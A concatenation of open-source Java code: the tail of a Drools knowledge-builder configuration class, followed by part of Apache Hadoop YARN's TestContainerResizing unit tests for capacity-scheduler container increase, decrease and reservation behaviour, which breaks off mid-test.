} else if (EvaluatorOption.class.equals(option)) {
return this.evaluatorRegistry.keySet();
} else if (KBuilderSeverityOption.class.equals(option)) {
return this.severityMap.keySet();
}
return null;
}
public <T extends KnowledgeBuilderOption> void setOption(T option) {
if (option instanceof DefaultDialectOption) {
this.defaultDialect = (DefaultDialectOption) option;
} else if (option instanceof AccumulateFunctionOption) {
this.accumulateFunctions.put(((AccumulateFunctionOption) option).getName(),
((AccumulateFunctionOption) option).getFunction());
} else if (option instanceof DumpDirOption) {
this.dumpDirectory = ((DumpDirOption) option).getDirectory();
} else if (option instanceof EvaluatorOption) {
this.evaluatorRegistry.addEvaluatorDefinition((EvaluatorDefinition) ((EvaluatorOption) option).getEvaluatorDefinition());
} else if (option instanceof ProcessStringEscapesOption) {
this.processStringEscapes = ((ProcessStringEscapesOption) option).isProcessStringEscapes();
} else if (option instanceof DefaultPackageNameOption) {
setDefaultPackageName(((DefaultPackageNameOption) option).getPackageName());
} else if (option instanceof ClassLoaderCacheOption) {
setClassLoaderCacheEnabled(((ClassLoaderCacheOption) option).isClassLoaderCacheEnabled());
} else if (option instanceof TrimCellsInDTableOption) {
setTrimCellsInDTable(((TrimCellsInDTableOption) option).isTrimCellsInDTable());
} else if (option instanceof GroupDRLsInKieBasesByFolderOption) {
setGroupDRLsInKieBasesByFolder(((GroupDRLsInKieBasesByFolderOption) option).isGroupDRLsInKieBasesByFolder());
} else if (option instanceof KBuilderSeverityOption) {
this.severityMap.put(((KBuilderSeverityOption) option).getName(), ((KBuilderSeverityOption) option).getSeverity());
} else if (option instanceof PropertySpecificOption) {
propertySpecificOption = (PropertySpecificOption) option;
} else if (option instanceof LanguageLevelOption) {
this.languageLevel = ((LanguageLevelOption) option);
} else if (option instanceof ExternaliseCanonicalModelLambdaOption) {
this.externaliseCanonicalModelLambda = ((ExternaliseCanonicalModelLambdaOption) option).isCanonicalModelLambdaExternalized();
} else if (option instanceof ParallelLambdaExternalizationOption) {
this.parallelLambdaExternalization = ((ParallelLambdaExternalizationOption) option).isLambdaExternalizationParallel();
} else if (option instanceof AlphaNetworkCompilerOption) {
this.alphaNetworkCompilerOption = ((AlphaNetworkCompilerOption) option);
}
}
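    // Usage sketch (values are illustrative): options can also be applied generically through
    // setOption(); each option instance is routed to the matching field or registry above:
    //   config.setOption(DefaultPackageNameOption.get("org.example.rules"));
    //   config.setOption(DumpDirOption.get(new File("/tmp/drools-dump")));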
public CompilationCache getCompilationCache() {
return compilationCache;
}
public void setCompilationCache(CompilationCache cache) {
this.compilationCache = cache;
}
public boolean isPreCompiled() {
return this.compilationCache != null;
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.yarn.api.protocolrecords.AllocateResponse;
import org.apache.hadoop.yarn.api.records.ApplicationAttemptId;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerUpdateType;
import org.apache.hadoop.yarn.api.records.NodeId;
import org.apache.hadoop.yarn.api.records.Priority;
import org.apache.hadoop.yarn.api.records.ResourceRequest;
import org.apache.hadoop.yarn.api.records.UpdateContainerRequest;
import org.apache.hadoop.yarn.api.records.UpdatedContainer;
import org.apache.hadoop.yarn.conf.YarnConfiguration;
import org.apache.hadoop.yarn.server.resourcemanager.MockAM;
import org.apache.hadoop.yarn.server.resourcemanager.MockNM;
import org.apache.hadoop.yarn.server.resourcemanager.MockRM;
import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.NullRMNodeLabelsManager;
import org.apache.hadoop.yarn.server.resourcemanager.nodelabels.RMNodeLabelsManager;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMApp;
import org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptState;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainer;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerEvent;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerEventType;
import org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerState;
import org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNode;
import org.apache.hadoop.yarn.server.resourcemanager.rmnode.RMNodeImpl;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.ResourceScheduler;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler
.SchedulerApplicationAttempt;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica.FiCaSchedulerApp;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.common.fica
.FiCaSchedulerNode;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.AppAttemptRemovedSchedulerEvent;
import org.apache.hadoop.yarn.server.resourcemanager.scheduler.event.NodeUpdateSchedulerEvent;
import org.apache.hadoop.yarn.util.resource.Resources;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class TestContainerResizing {
private static final Log LOG = LogFactory.getLog(TestContainerResizing.class);
private final int GB = 1024;
private YarnConfiguration conf;
RMNodeLabelsManager mgr;
class MyScheduler extends CapacityScheduler {
/*
* A Mock Scheduler to simulate the potential effect of deadlock between:
* 1. The AbstractYarnScheduler.decreaseContainers() call (from
* ApplicationMasterService thread)
* 2. The CapacityScheduler.allocateContainersToNode() call (from the
* scheduler thread)
*/
MyScheduler() {
super();
}
@Override
protected void decreaseContainers(
List<UpdateContainerRequest> decreaseRequests,
SchedulerApplicationAttempt attempt) {
try {
Thread.sleep(1000);
} catch(InterruptedException e) {
LOG.debug("Thread interrupted.");
}
super.decreaseContainers(decreaseRequests, attempt);
}
@Override
public synchronized void allocateContainersToNode(FiCaSchedulerNode node) {
try {
Thread.sleep(1000);
} catch(InterruptedException e) {
LOG.debug("Thread interrupted.");
}
super.allocateContainersToNode(node);
}
}
@Before
public void setUp() throws Exception {
conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
mgr = new NullRMNodeLabelsManager();
mgr.init(conf);
}
@Test
public void testSimpleIncreaseContainer() throws Exception {
/**
     * Application has a container running and the node has enough available
     * resource. Send an increase request and check that the container is increased.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 20 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 1GB to 3GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(3 * GB))));
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
checkPendingResource(rm1, "default", 2 * GB, null);
Assert.assertEquals(2 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
// Pending resource should be deducted
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
verifyContainerIncreased(am1.allocate(null, null), containerId1, 3 * GB);
verifyAvailableResourceOfSchedulerNode(rm1, nm1.getNodeId(), 17 * GB);
rm1.close();
}
@Test
public void testSimpleDecreaseContainer() throws Exception {
/**
     * Application has a container running; decrease the container and check
     * that the queue's usage and the container resource are updated.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 20 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(3 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
checkUsedResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
    // am1 asks to decrease its AM container from 3GB to 1GB
AllocateResponse response = am1.sendContainerResizingRequest(Arrays
.asList(UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.DECREASE_RESOURCE,
Resources.createResource(1 * GB))));
verifyContainerDecreased(response, containerId1, 1 * GB);
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
    // Check that the decreased container was added to the RMNode
RMNodeImpl rmNode =
(RMNodeImpl) rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
Collection<Container> decreasedContainers =
rmNode.getToBeDecreasedContainers();
boolean rmNodeReceivedDecreaseContainer = false;
for (Container c : decreasedContainers) {
if (c.getId().equals(containerId1)
&& c.getResource().equals(Resources.createResource(1 * GB))) {
rmNodeReceivedDecreaseContainer = true;
}
}
Assert.assertTrue(rmNodeReceivedDecreaseContainer);
rm1.close();
}
@Test
public void testSimpleIncreaseRequestReservation() throws Exception {
/**
     * Application has two containers running; try to increase one of them while
     * the node doesn't have enough resource, so the increase request is reserved.
     * Check resource usage after the reservation, then finish a container and
     * verify that the reserved increase is allocated.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
    // am1 asks to increase its AM container from 1GB to 7GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(7 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete one container and do another allocation
am1.allocate(null, Arrays.asList(containerId2));
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
// Now container should be increased
verifyContainerIncreased(am1.allocate(null, null), containerId1, 7 * GB);
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 7 * GB, null);
Assert.assertEquals(7 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(7 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
verifyAvailableResourceOfSchedulerNode(rm1, nm1.getNodeId(), 1 * GB);
rm1.close();
}
@Test
public void testIncreaseRequestWithNoHeadroomLeft() throws Exception {
/**
     * Application has two containers running; try to increase one of them by an
     * amount that exceeds the user's headroom for the queue.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate 1 container
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
    // am1 asks to change container2 from 2GB to 8GB, which will exceed the user
    // limit
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should *NOT* be reserved as it exceeds user limit
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will *NOT* be updated
checkUsedResource(rm1, "default", 3 * GB, null);
Assert.assertEquals(3 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
rm1.close();
}
@Test
public void testExcessiveReservationWhenCancelIncreaseRequest()
throws Exception {
/**
     * Application has two containers running; try to increase one of them while
     * the node doesn't have enough resource, so the increase request is reserved.
     * Check resource usage after the reservation, then finish a container and
     * cancel the increase request; the reservation should be cancelled.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
    // am1 asks to increase its AM container from 1GB to 7GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(7 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
    // Complete one container and cancel the increase request (by sending an
    // increase request with target_capacity = existing_capacity)
am1.allocate(null, Arrays.asList(containerId2));
    // am1 asks to change its AM container from 1G to 1G (which effectively
    // cancels the increase request)
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(1 * GB))));
// Trigger a node heartbeat..
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testExcessiveReservationWhenDecreaseSameContainer()
throws Exception {
/**
     * Very similar to testExcessiveReservationWhenCancelIncreaseRequest: after
     * the increase request is reserved, the app decreases the same container;
     * the container should be decreased and the reservation cancelled.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(2 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
ContainerId containerId1 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
sentRMContainerLaunched(rm1, containerId1);
// am1 asks to change its AM container from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer1 = app.getLiveContainersMap().get(containerId1);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer1.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer1.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 10 * GB, null);
Assert.assertEquals(10 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(4 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
    // Complete one container and cancel the increase request (by sending an
    // increase request with target_capacity = existing_capacity)
am1.allocate(null, Arrays.asList(containerId2));
// am1 asks to change its AM container from 2G to 1G (decrease)
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId1,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(1 * GB))));
// Trigger a node heartbeat..
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer1.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerUnreservedWhenContainerCompleted()
throws Exception {
/**
     * App has two containers on the same node (node.resource = 8G): container1
     * (AM) = 1G, container2 = 2G. App asks to increase container2 to 8G.
*
* So increase container request will be reserved. When app releases
* container2, reserved part should be released as well.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(rm1.waitForState(nm1, containerId2,
RMContainerState.ALLOCATED, 10 * 1000));
// Acquire them, and NM report RUNNING
am1.allocate(null, null);
sentRMContainerLaunched(rm1, containerId2);
rm1.waitForContainerState(containerId2, RMContainerState.RUNNING);
    // am1 asks to increase container2 from 2GB to 8GB
am1.sendContainerResizingRequest(Arrays.asList(
UpdateContainerRequest
.newInstance(0, containerId2,
ContainerUpdateType.INCREASE_RESOURCE,
Resources.createResource(8 * GB))));
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
    // NM1 does 1 heartbeat
CapacityScheduler cs = (CapacityScheduler) rm1.getResourceScheduler();
RMNode rmNode1 = rm1.getRMContext().getRMNodes().get(nm1.getNodeId());
cs.handle(new NodeUpdateSchedulerEvent(rmNode1));
RMContainer rmContainer2 = app.getLiveContainersMap().get(containerId2);
/* Check reservation statuses */
// Increase request should be reserved
Assert.assertTrue(rmContainer2.hasIncreaseReservation());
Assert.assertEquals(6 * GB, rmContainer2.getReservedResource().getMemorySize());
Assert.assertFalse(app.getReservedContainers().isEmpty());
Assert.assertNotNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
// Pending resource will not be changed since it's not satisfied
checkPendingResource(rm1, "default", 6 * GB, null);
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 9 * GB, null);
Assert.assertEquals(9 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(3 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
Assert.assertEquals(6 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
// Complete container2, container will be unreserved and completed
am1.allocate(null, Arrays.asList(containerId2));
/* Check statuses after reservation satisfied */
// Increase request should be unreserved
Assert.assertTrue(app.getReservedContainers().isEmpty());
Assert.assertNull(cs.getNode(nm1.getNodeId()).getReservedContainer());
Assert.assertFalse(rmContainer2.hasIncreaseReservation());
// Pending resource will be changed since it's satisfied
checkPendingResource(rm1, "default", 0 * GB, null);
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getPending().getMemorySize());
// Queue/user/application's usage will be updated
checkUsedResource(rm1, "default", 1 * GB, null);
Assert.assertEquals(1 * GB, ((LeafQueue) cs.getQueue("default"))
.getUser("user").getUsed().getMemorySize());
Assert.assertEquals(0 * GB,
app.getAppAttemptResourceUsage().getReserved().getMemorySize());
Assert.assertEquals(1 * GB,
app.getAppAttemptResourceUsage().getUsed().getMemorySize());
rm1.close();
}
@Test
public void testIncreaseContainerUnreservedWhenApplicationCompleted()
throws Exception {
/**
     * Similar to testIncreaseContainerUnreservedWhenContainerCompleted: when the
     * application finishes, the reserved increase should be cancelled.
*/
MockRM rm1 = new MockRM() {
@Override
public RMNodeLabelsManager createNodeLabelManager() {
return mgr;
}
};
rm1.start();
MockNM nm1 = rm1.registerNode("h1:1234", 8 * GB);
MockNM nm2 = rm1.registerNode("h2:1234", 8 * GB);
// app1 -> a1
RMApp app1 = rm1.submitApp(1 * GB, "app", "user", null, "default");
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
FiCaSchedulerApp app = TestUtils.getFiCaSchedulerApp(
rm1, app1.getApplicationId());
// Allocate two more containers
am1.allocate(
Arrays.asList(ResourceRequest.newInstance(Priority.newInstance(1), "*",
Resources.createResource(2 * GB), 1)),
null);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
Assert.assertTrue(
